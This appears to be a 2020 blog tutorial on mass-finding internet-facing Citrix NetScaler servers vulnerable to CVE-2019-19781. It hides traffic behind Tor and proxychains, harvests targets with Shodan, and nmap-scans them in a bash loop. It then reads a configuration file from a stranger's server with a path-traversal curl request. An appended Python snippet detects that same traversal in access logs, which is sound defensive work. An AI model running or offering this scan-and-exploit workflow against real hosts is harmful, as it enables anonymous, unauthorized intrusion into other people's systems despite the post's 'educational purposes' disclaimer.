citrix-vulnerability

How to find a vulnerable Citrix NetScaler server on the internet?
2020 May 14th

NOTICE: Educational purposes only!

Hi, I want to show you how easy it is to find a vulnerable server on the internet. OK guys, so first of all we need a Tor client for anonymity 😉 Before we begin, look at the following tools:

$ tor &
$ nyx -i 127.0.0.1:9052
Then we can test whether Tor is working correctly with proxychains:
$ proxychains curl ifconfig.me
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  ifconfig.me:80  ...  OK
46.166.139.111
Run Shodan to get all open services that look like a Citrix ADC Gateway:
$ proxychains -q shodan search --fields="ip_str,port" citrix netscaler > $HOME/citrix_list
Now we will prepare a script that scans these services for CVE-2019-19781:
#!/bin/bash

CITRIX_IP_LIST="$HOME/citrix_list"

# Each line of the Shodan export holds "<ip> <port>"; read both fields directly
# and quote them so odd values cannot be word-split by the shell.
while read -r IP PORT; do
        [ -z "$IP" ] && continue   # skip empty lines
        proxychains -q nmap -p "$PORT" -sV --script CVE-2019-19781 "$IP"
done < "$CITRIX_IP_LIST"
After a short while we get some interesting results: there are still servers with this vulnerability present.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:16 CET
Nmap scan report for ---.---.---.---
Host is up (0.75s latency).

PORT      STATE SERVICE     VERSION
----/tcp open  ssl/unknown
| CVE-2019-19781:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2019-19781
|     Risk factor: HIGH
|                   A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
|     Disclosure date: 2019-12-17
|     References:
|       https://support.citrix.com/article/CTX267027
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.99 seconds

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:18 CET
Nmap scan report for ---.---.---.---
Host is up (0.47s latency).

PORT      STATE SERVICE     VERSION
----/tcp open  ssl/unknown
| CVE-2019-19781:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2019-19781
|     Risk factor: HIGH
|                   A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
|     Disclosure date: 2019-12-17
|     References:
|       https://support.citrix.com/article/CTX267027
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.11 seconds

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:21 CET
Nmap scan report for ---.---.---.---
Host is up (0.53s latency).

PORT      STATE SERVICE     VERSION
----/tcp open  ssl/unknown
| CVE-2019-19781:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2019-19781
|     Risk factor: HIGH
|                   A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
|     Disclosure date: 2019-12-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
|_      https://support.citrix.com/article/CTX267027

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.56 seconds
We can verify the vulnerability by using curl.
$ proxychains -q curl -k --path-as-is https://<host>:<port>/vpn/../vpns/cfg/smb.conf  && echo -e
[global]
        encrypt passwords = yes
        name resolve order = lmhosts wins host bcast
And that's it. 🙂 We will not continue from this point, but there exists an RCE exploit that enables the user to gain full control.
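The same traversal the curl check above relies on (a request under /vpn/ that climbs with ../ into /vpns/) is equally visible from the defender's side in the gateway's access log. The following Python is an added example, not code from the original post: the log lines are constructed in combined log format with documentation-range addresses, and the matcher URL-decodes the path before testing it so an encoded ../ is not missed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); the addresses are
# documentation ranges, not real hosts. Line 2 is the probe from the post,
# line 3 the same request with the dots URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jan/2020:15:16:02 +0100] "GET /vpn/index.html HTTP/1.1" 200 2213 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Jan/2020:15:16:03 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 108 "-" "curl/7.68.0"
198.51.100.7 - - [24/Jan/2020:15:18:10 +0100] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 403 0 "-" "curl/7.68.0"
198.51.100.9 - - [24/Jan/2020:15:19:00 +0100] "POST /cgi/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-log line: client IP, request path, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal_probe(path: str) -> bool:
    """True when the decoded path enters under /vpn/ and reaches /vpns/ via '..'.

    Decoding is applied twice so single- and double-encoded dots are both caught.
    """
    decoded = unquote(unquote(path))
    return decoded.startswith("/vpn/") and "/../" in decoded and "/vpns/" in decoded


def find_probes(log_text: str) -> list:
    """Return (client ip, raw path, status) for every matching request.

    A 200 means the gateway actually served the file, i.e. the traversal worked;
    a 403 is the kind of answer a blocking rule in front of /vpns/ would give
    (assumed here for the constructed sample, not taken from the post).
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_probe(m["path"]):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_probes(SAMPLE_LOG):
        print(f"{ip} requested {path} -> {status}")
```

Running it over a real access log simply means replacing SAMPLE_LOG with the file contents; the 200 hits are the requests that need incident handling, the rest show who is probing.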